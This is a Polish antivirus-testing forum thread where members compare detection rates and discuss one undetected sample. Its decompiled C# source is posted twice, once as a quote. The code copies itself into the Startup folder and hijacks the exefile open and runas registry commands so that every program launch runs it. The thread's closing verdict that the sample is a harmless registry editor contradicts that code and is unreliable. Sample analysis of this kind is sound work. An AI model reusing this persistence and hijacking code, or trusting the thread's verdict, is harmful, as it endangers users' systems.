Liczba postów: 2 183
Liczba wątków: 96
Dołączył: 02.03.2008
Reputacja:
238
Panda Cloud Antivirus PRO 1.5.1
270/311 (87%)
Liczba postów: 3 833
Liczba wątków: 70
Dołączył: 17.04.2008
Reputacja:
94
Paczki na pewno dobrze wysłane. Ostatnią 2 razy wysyłałem. Niektórym się ściąga niektórym nie, tylko ciekawe dlaczego?
Ciekawa sprawa, ja na FTP wysyłam i ściągam pełną łącza, a przez www nie mogę ściągnąć, błąd na samym początku.
KIS/EIS/MKS, MBAM, HitmanPro, Eset Online, WF+uBlock
Zmieniłem nieco na malwares, spróbujcie teraz pobierać - powinno iść dobrze (u mnie te dwie ostatni śmigają).
Liczba postów: 3 833
Liczba wątków: 70
Dołączył: 17.04.2008
Reputacja:
94
No, teraz idzie na www
KIS/EIS/MKS, MBAM, HitmanPro, Eset Online, WF+uBlock
Liczba postów: 1 660
Liczba wątków: 25
Dołączył: 13.10.2010
Reputacja:
63
Teraz już idzie .
CIS 5.8 Beta: 310/311 (99,7%)
309 zwykłym skanem + 1 Defense+
Według Comodo ten niewykryty plik jest zaufany.
Liczba postów: 3 833
Liczba wątków: 70
Dołączył: 17.04.2008
Reputacja:
94
Patrzcie jaki sampelek, 2 dni się trzyma, zero detekcji: [Aby zobaczyć linki, zarejestruj się tutaj]
Kasper go przy uruchamianiu HIPSem w kwarantannę.
Valkyria coś tam czuje: [Aby zobaczyć linki, zarejestruj się tutaj]
KIS/EIS/MKS, MBAM, HitmanPro, Eset Online, WF+uBlock
Gdzie go można... znaleźć?
Liczba postów: 3 833
Liczba wątków: 70
Dołączył: 17.04.2008
Reputacja:
94
Tu:
oraz będzie dziś w paczce.
KIS/EIS/MKS, MBAM, HitmanPro, Eset Online, WF+uBlock
Liczba postów: 2 390
Liczba wątków: 39
Dołączył: 15.09.2010
Reputacja:
72
A skąd ta pewność, że to malware?
BTW U mnie nawet nie chce się uruchomić.
[Aby zobaczyć linki, zarejestruj się tutaj]
[Aby zobaczyć linki, zarejestruj się tutaj]
Liczba postów: 3 833
Liczba wątków: 70
Dołączył: 17.04.2008
Reputacja:
94
Stąd, że uruchamiałem, podmienił skurwiel shella (nie można uruchomić EXE), to chyba jakiś FakeAV, alko KillAV, bo po restarcie nic nie można było uruchomić, ale poradziłem sobie
Może odporny na DEP, masz włączony?. Bo ja testowym mam wyłączony (tzn. tylko dla systemowych plików)
KIS/EIS/MKS, MBAM, HitmanPro, Eset Online, WF+uBlock
Liczba postów: 418
Liczba wątków: 39
Dołączył: 27.07.2011
Reputacja:
-2
Bitdefender Internet Security
Liczba postów: 2 390
Liczba wątków: 39
Dołączył: 15.09.2010
Reputacja:
72
DEP mam ustawiony tak samo jak Ty.
[Aby zobaczyć linki, zarejestruj się tutaj]
Liczba postów: 3 833
Liczba wątków: 70
Dołączył: 17.04.2008
Reputacja:
94
Może na XP nie chce działać...
[Aby zobaczyć linki, zarejestruj się tutaj]
[Aby zobaczyć linki, zarejestruj się tutaj]
KIS/EIS/MKS, MBAM, HitmanPro, Eset Online, WF+uBlock
Liczba postów: 2 390
Liczba wątków: 39
Dołączył: 15.09.2010
Reputacja:
72
Możliwe, pewnie nie działa, nu u Ciebie robi bałagan
Poprosiłem o szybką anlizę pliczku i taka odpowiedź po 3 minutach:
Cytat: Hello,
The sample is not malicious, it''s just a custom command-line registry editor.
Best regards,
FlorinG
???
Bedę śledził z uwagą, jak rozwinie się sytuacja dotycząca tej próbki.
[Aby zobaczyć linki, zarejestruj się tutaj]
Liczba postów: 4 085
Liczba wątków: 94
Dołączył: 13.05.2011
Reputacja:
109
Emsisoft Anti Malware 274/311 (88,1%)
Liczba postów: 3 833
Liczba wątków: 70
Dołączył: 17.04.2008
Reputacja:
94
Napisałem do xylitola o analizę, odpisał mi, że ten plik korzysta z .NET, i analiza:
Kod: internal class VMain
{
// Fields
private static bool beEvil = true;
private static RegistryKey def = Registry.ClassesRoot;
private static string gene = (!beEvil ? "\"%1\" %*" : ("\"" + Assembly.GetExecutingAssembly().GetName().CodeBase.Substring(8) + "\" %*"));
private static string[] nuke = new string[] { @"exefile\shell\open\command", @"exefile\shell\runas\command", @"exefile\shell\open\command", @"exefile\shell\runas\command" };
private static RegistryKey[] nukePos = new RegistryKey[] { Registry.ClassesRoot, Registry.ClassesRoot, Registry.ClassesRoot, Registry.ClassesRoot };
private static object[] nukeRep = new object[] { gene, gene, gene, gene };
private static string[] nukeVal = new string[] { "IsolatedCommand", "IsolatedCommand", "", "" };
private static RegistryKey reg = def;
// Methods
private static void Crawl()
{
string str = Console.ReadLine();
if (str.ToLower() == "back")
{
reg = def;
}
else if ((str.Length >= 3) && (str.Substring(0, 3) == "all"))
{
if (str.Length == 3)
{
str = "all ";
}
foreach (string str2 in reg.GetSubKeyNames())
{
if ((str2.Length >= (str.Length - 4)) && (str2.Substring(0, str.Length - 4) == str.Substring(4)))
{
Console.WriteLine(str2);
}
}
}
else if ((str.Length >= 3) && (str.Substring(0, 3) == "set"))
{
string[] strArray2 = str.Split(new char[] { char.Parse("|") });
reg.SetValue(strArray2[1], strArray2[2]);
}
else
{
if ((str.Length >= "fix".Length) && (str == "fix"))
{
RegEdit();
Console.WriteLine("Re-set exe run arguements.");
}
else if (str == "about")
{
Console.WriteLine("This is a simple command-line regedit by chc4, because he got bored one day.");
Console.WriteLine("It is written in C#, terribly inefficient, and I have no idea why you would use");
Console.WriteLine("this over regedit.exe");
Console.WriteLine("-8/23/2011");
}
else if (str == "help")
{
Console.WriteLine("back - Returns you to the Classes Root directory.");
Console.WriteLine("all [sub] - Searches the current directory for sub.");
Console.WriteLine("set|value|newvalue - Sets the value of the key ''value'' in the current directory.");
Console.WriteLine("fix - Re-sets standard exefile run arguments, for those nasty rogues.");
Console.WriteLine("help - Display this message.");
Console.WriteLine("Anything else will do a search for the queury in the current directory, if found will goto new directory.");
}
foreach (string str3 in reg.GetSubKeyNames())
{
if ((str3.Length >= str.Length) && (str3.Substring(0, str.Length) == str))
{
reg = reg.OpenSubKey(str3, true);
return;
}
}
}
}
private static void doEvil()
{
if (beEvil && !File.Exists(@"C:\Users\" + WindowsIdentity.GetCurrent().Name.Split(new char[] { ''\\'' })[1] + @"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\icef.exe"))
{
File.Copy(Assembly.GetExecutingAssembly().GetName().CodeBase.Substring(8), @"C:\Users\" + WindowsIdentity.GetCurrent().Name.Split(new char[] { ''\\'' })[1] + @"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\icef.exe", true);
RegEdit();
}
}
private static void LoopBack()
{
Console.WriteLine(">" + reg.Name);
Crawl();
Console.WriteLine("--------------------");
LoopBack();
}
public static void Main(string[] arg)
{
Console.Title = "IceFire (cmdLine regedit, chc4)";
try
{
Registry.ClassesRoot.OpenSubKey("exefile", true);
doEvil();
LoopBack();
}
catch (SecurityException)
{
Console.WriteLine("Please run as Administrator.");
Console.ReadLine();
Process.GetCurrentProcess().Close();
}
catch (Exception exception)
{
Console.WriteLine("Error:" + exception.Message + exception.ToString());
Console.ReadLine();
Process.GetCurrentProcess().Close();
}
}
private static void RegEdit()
{
for (int i = 0; i < nuke.Length; i++)
{
nukePos[i].OpenSubKey(nuke[i], true).SetValue(nukeVal[i], nukeRep[i]);
}
}
}
Collapse Methods
KIS/EIS/MKS, MBAM, HitmanPro, Eset Online, WF+uBlock
Liczba postów: 4 085
Liczba wątków: 94
Dołączył: 13.05.2011
Reputacja:
109
tommy504 napisał(a):Napisałem do xylitola o analizę, odpisał mi, że ten plik korzysta z .NET, i analiza:
Kod: internal class VMain
{
// Fields
private static bool beEvil = true;
private static RegistryKey def = Registry.ClassesRoot;
private static string gene = (!beEvil ? "\"%1\" %*" : ("\"" + Assembly.GetExecutingAssembly().GetName().CodeBase.Substring(8) + "\" %*"));
private static string[] nuke = new string[] { @"exefile\shell\open\command", @"exefile\shell\runas\command", @"exefile\shell\open\command", @"exefile\shell\runas\command" };
private static RegistryKey[] nukePos = new RegistryKey[] { Registry.ClassesRoot, Registry.ClassesRoot, Registry.ClassesRoot, Registry.ClassesRoot };
private static object[] nukeRep = new object[] { gene, gene, gene, gene };
private static string[] nukeVal = new string[] { "IsolatedCommand", "IsolatedCommand", "", "" };
private static RegistryKey reg = def;
// Methods
private static void Crawl()
{
string str = Console.ReadLine();
if (str.ToLower() == "back")
{
reg = def;
}
else if ((str.Length >= 3) && (str.Substring(0, 3) == "all"))
{
if (str.Length == 3)
{
str = "all ";
}
foreach (string str2 in reg.GetSubKeyNames())
{
if ((str2.Length >= (str.Length - 4)) && (str2.Substring(0, str.Length - 4) == str.Substring(4)))
{
Console.WriteLine(str2);
}
}
}
else if ((str.Length >= 3) && (str.Substring(0, 3) == "set"))
{
string[] strArray2 = str.Split(new char[] { char.Parse("|") });
reg.SetValue(strArray2[1], strArray2[2]);
}
else
{
if ((str.Length >= "fix".Length) && (str == "fix"))
{
RegEdit();
Console.WriteLine("Re-set exe run arguements.");
}
else if (str == "about")
{
Console.WriteLine("This is a simple command-line regedit by chc4, because he got bored one day.");
Console.WriteLine("It is written in C#, terribly inefficient, and I have no idea why you would use");
Console.WriteLine("this over regedit.exe");
Console.WriteLine("-8/23/2011");
}
else if (str == "help")
{
Console.WriteLine("back - Returns you to the Classes Root directory.");
Console.WriteLine("all [sub] - Searches the current directory for sub.");
Console.WriteLine("set|value|newvalue - Sets the value of the key ''value'' in the current directory.");
Console.WriteLine("fix - Re-sets standard exefile run arguments, for those nasty rogues.");
Console.WriteLine("help - Display this message.");
Console.WriteLine("Anything else will do a search for the queury in the current directory, if found will goto new directory.");
}
foreach (string str3 in reg.GetSubKeyNames())
{
if ((str3.Length >= str.Length) && (str3.Substring(0, str.Length) == str))
{
reg = reg.OpenSubKey(str3, true);
return;
}
}
}
}
private static void doEvil()
{
if (beEvil && !File.Exists(@"C:\Users\" + WindowsIdentity.GetCurrent().Name.Split(new char[] { ''\\'' })[1] + @"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\icef.exe"))
{
File.Copy(Assembly.GetExecutingAssembly().GetName().CodeBase.Substring(8), @"C:\Users\" + WindowsIdentity.GetCurrent().Name.Split(new char[] { ''\\'' })[1] + @"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\icef.exe", true);
RegEdit();
}
}
private static void LoopBack()
{
Console.WriteLine(">" + reg.Name);
Crawl();
Console.WriteLine("--------------------");
LoopBack();
}
public static void Main(string[] arg)
{
Console.Title = "IceFire (cmdLine regedit, chc4)";
try
{
Registry.ClassesRoot.OpenSubKey("exefile", true);
doEvil();
LoopBack();
}
catch (SecurityException)
{
Console.WriteLine("Please run as Administrator.");
Console.ReadLine();
Process.GetCurrentProcess().Close();
}
catch (Exception exception)
{
Console.WriteLine("Error:" + exception.Message + exception.ToString());
Console.ReadLine();
Process.GetCurrentProcess().Close();
}
}
private static void RegEdit()
{
for (int i = 0; i < nuke.Length; i++)
{
nukePos[i].OpenSubKey(nuke[i], true).SetValue(nukeVal[i], nukeRep[i]);
}
}
}
Collapse Methods
I co z tego wynika?
Że jest napisany w C# i jest edytorem rejestru. Napisany został przez człowieka który nudził się...
Liczba postów: 2 390
Liczba wątków: 39
Dołączył: 15.09.2010
Reputacja:
72
Czyli analiza Florina była OK
[Aby zobaczyć linki, zarejestruj się tutaj]
|